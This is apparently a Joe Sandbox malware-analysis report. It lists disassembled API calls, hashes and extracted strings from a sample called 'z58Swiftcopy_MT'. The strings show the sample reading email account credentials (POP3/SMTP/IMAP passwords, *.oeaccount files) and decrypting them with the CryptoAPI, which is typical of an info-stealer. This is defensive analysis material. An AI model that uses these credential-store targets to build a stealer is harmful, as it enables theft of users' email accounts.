                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`-v,00407A43,00000001,?,00000000,`-v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                                      • String ID: `-v
                                                                                                                                                                                                                                      • API String ID: 3056473165-2394497839
                                                                                                                                                                                                                                      • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408D5C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408D7A
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408D98
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408DA8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                      • String ID: Arial
                                                                                                                                                                                                                                      • API String ID: 3853255127-493054409
                                                                                                                                                                                                                                      • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                                                                                                      • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 145871493-0
                                                                                                                                                                                                                                      • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                                      • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                                      • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
